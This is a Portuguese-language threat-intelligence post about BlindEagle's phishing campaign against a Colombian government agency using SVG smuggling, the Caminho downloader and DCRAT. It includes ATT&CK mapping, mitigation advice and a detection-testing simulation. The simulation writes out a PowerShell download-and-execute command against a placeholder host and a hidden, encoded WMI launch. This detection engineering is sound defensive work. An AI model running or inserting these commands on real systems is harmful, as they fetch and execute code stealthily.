SOC Prime Bias: Crítico

17 Dez 2025 17:04
newspaper icon BlindEagle Alveja Setor de Seguros da Colômbia com BlotchyQuasar Leia post

BlindEagle Alvo Agência Governamental Colombiana com Caminho e DCRAT

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
BlindEagle Alvo Agência Governamental Colombiana com Caminho e DCRAT
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Resumo

BlindEagle realizou uma operação de spear-phishing mirando uma agência governamental colombiana, entregando um anexo SVG armado que iniciou uma cadeia de execução de JavaScript para PowerShell. Essa sequência baixou um downloader chamado Caminho, que então buscou o trojan de acesso remoto open-source DCRAT hospedado no Discord. A etapa final utilizou o processo hollowing no MSBuild.exe e aplicou múltiplos métodos de evasão para reduzir a detecção.

Investigação

O Zscaler ThreatLabz analisou o fluxo de infecção e relatou uma abordagem de contrabando de SVG, vários níveis de JavaScript ofuscado, um comando PowerShell acionado por WMI, e a entrega do Caminho através de uma URL hospedada no Discord. A investigação também associou a infraestrutura de suporte a endereços IP suecos e um provedor de DNS dinâmico (ydns.eu).

Mitigação

Aplique controles mais rígidos para anexos de email recebidos – especialmente conteúdo SVG – e aplique desarmamento/inspeção de conteúdo para scripts embutidos. Use políticas de proxy web para restringir o acesso a endpoints de hospedagem de arquivos suspeitos, incluindo URLs de arquivo do Discord usadas para entrega de malware. Monitore padrões incomuns de execução de PowerShell e WMI e imponha políticas de lista de permissão de aplicativos cobrindo o uso do MSBuild.exe.

Resposta

Resposta

Acione alertas para o artefato SVG malicioso, o nome de arquivo JavaScript referenciado, e downloads atingindo a URL do Discord. Procure por traços em memória ou em disco do Caminho e DCRAT, evidências de hollowing de processo do MSBuild.exe, e persistência via mudanças no registro ou tarefas agendadas. Quarentena terminais impactados e bloqueie o domínio C2 identificado.

“graph TB %% Class definitions classDef action fill:#99ccff classDef technique fill:#ffcc99 classDef tool fill:#cccccc classDef malware fill:#ff9999 %% Nodes initial_access_phishing[“<b>Ação</b> – <b>T1566.001 Anexo de Phishing</b><br />Anexo SVG no e-mail”] class initial_access_phishing action user_exec_malicious_link[“<b>Ação</b> – <b>T1204.001 Execução pelo Usuário</b><br />Clicar na imagem SVG maliciosa”] class user_exec_malicious_link action user_exec_malicious_file[“<b>Ação</b> – <b>T1204.002 Execução pelo Usuário</b><br />Abrir arquivo JavaScript”] class user_exec_malicious_file action obfuscation_svg_smuggling[“<b>Técnica</b> – <b>T1027.017</b><br />Contrabando de SVG para ocultar script”] class obfuscation_svg_smuggling technique obfuscation_embedded_payloads[“<b>Técnica</b> – <b>T1027.009</b><br />Payloads JavaScript codificados em Base64”] class obfuscation_embedded_payloads technique command_js[“<b>Técnica</b> – <b>T1059.007 JavaScript</b><br />Scripts de desofuscação”] class command_js technique command_powershell[“<b>Técnica</b> – <b>T1059.001 PowerShell</b><br />Criação de WMI para executar PowerShell”] class command_powershell technique event_wmi_subscription[“<b>Técnica</b> – <b>T1546.003</b><br />Execução de assinatura de evento WMI”] class event_wmi_subscription technique obfuscation_steganography[“<b>Técnica</b> – <b>T1027.003</b><br />Payload oculto em imagem PNG”] class obfuscation_steganography technique reflective_code_loading[“<b>Técnica</b> – <b>T1620</b><br />Carregamento de assembly .NET reflexivo”] class reflective_code_loading technique process_hollowing[“<b>Técnica</b> – <b>T1055.012</b><br />Oclusão de processo com MsBuild”] class process_hollowing technique downloader_caminho[“<b>Ferramenta</b> – <b>Nome</b>: Caminho downloader<br /><b>Propósito</b>: Buscar DCRAT”] class downloader_caminho tool malware_dcrat[“<b>Malware</b> – <b>Nome</b>: DCRAT”] class malware_dcrat malware amsi_bypass[“<b>Técnica</b> – <b>T1027.005</b><br />Patch AMSI para contornar a detecção”] class amsi_bypass technique persistence_run_key[“<b>Técnica</b> – <b>T1547.001</b><br />Criar chave Run no registro”] class persistence_run_key technique persistence_scheduled_task[“<b>Técnica</b> – <b>T1053</b><br />Criar tarefa agendada”] class persistence_scheduled_task technique c2_discord[“<b>Comando & Controle</b> – URL do Discord usado para distribuição de payloads”] class c2_discord technique %% Connections initial_access_phishing u002du002d>|leads_to| user_exec_malicious_link user_exec_malicious_link u002du002d>|leads_to| user_exec_malicious_file user_exec_malicious_file u002du002d>|leads_to| obfuscation_svg_smuggling obfuscation_svg_smuggling u002du002d>|leads_to| obfuscation_embedded_payloads obfuscation_embedded_payloads u002du002d>|leads_to| command_js command_js u002du002d>|leads_to| command_powershell command_powershell u002du002d>|leads_to| event_wmi_subscription event_wmi_subscription u002du002d>|leads_to| obfuscation_steganography obfuscation_steganography u002du002d>|leads_to| reflective_code_loading reflective_code_loading u002du002d>|leads_to| process_hollowing process_hollowing u002du002d>|leads_to| downloader_caminho downloader_caminho u002du002d>|downloads| malware_dcrat malware_dcrat u002du002d>|performs| amsi_bypass malware_dcrat u002du002d>|establishes| persistence_run_key malware_dcrat u002du002d>|establishes| persistence_scheduled_task malware_dcrat u002du002d>|uses| c2_discord “

Fluxo de Ataque

Execução da Simulação

Pré-requisito: O Cheque de Pré-voo de Telemetria & Baseline deve ter passado.

Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visar gerar exatamente a telemetria esperada pela lógica de detecção.

  • Narrativa de Ataque & Comandos:
    O ator de ameaça (BlindEagle) usa WMI para gerar um processo PowerShell que baixa o payload “Caminho” de um servidor C2 remoto e o executa em memória. Ao aproveitar wmic.exe com o process call create método, o atacante pode executar o PowerShell sem interagir com uma sessão de usuário, tornando a atividade furtiva. A linha de comando contém a palavra literal “powershell”, que satisfaz a condição da regra de detecção.

    1. Etapa 1 – Prepare o PowerShell malicioso em uma linha:

      $url = "http://malicious.example.com/caminho.exe"
$out = "$env:TEMPcaminho.exe"
Invoke-WebRequest -Uri $url -OutFile $out; PowerShell -ExecutionPolicy Bypass -File $out

    2. Etapa 2 – Execute via WMI:

      $psCmd = 'powershell -nop -w hidden -enc <base64-encoded-payload>'
wmic process call create "$psCmd"

    A presença de powershell no CommandLine campo do Evento Sysmon 1 gerado pelo processo filho wmic irá acionar a regra.

  • Script de Teste de Regressão:

    # Simulação de PowerShell do BlindEagle via WMI
# ----------------------------------------------------------------------
# 1. Definir payload malicioso (para teste usamos um comando de eco benigno)
$payload = 'Write-Host "Execução simulada do Caminho"'
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))

# 2. Construir a linha de comando do PowerShell que inclui a palavra literal "powershell"
$psCommand = "powershell -NoProfile -EncodedCommand $encoded"

# 3. Inicie o comando via WMI (wmic) para gerar um Sysmon EventID 1
$wmicCommand = "wmic process call create `"$psCommand`""
Write-Host "Executando via WMI: $wmicCommand"
Invoke-Expression $wmicCommand

# 4. Opcional: Registrar no console para verificação
Write-Host "Simulação completa. Verifique a detecção no SIEM."

  • Comandos de Limpeza:

    # Remova quaisquer arquivos temporários (nenhum criado nesta simulação)
# Mate quaisquer processos wmic ou PowerShell remanescentes iniciados para o teste
Get-Process -Name wmic, powershell -ErrorAction SilentlyContinue | Stop-Process -Force
Write-Host "Limpeza completa."

Junte-se à plataforma Detection as Code da SOC Prime para melhorar a visibilidade das ameaças mais relevantes para o seu negócio. Para ajudá-lo a começar e obter valor imediato, agende uma reunião agora com os especialistas da SOC Prime.

Junte-se Gratuitamente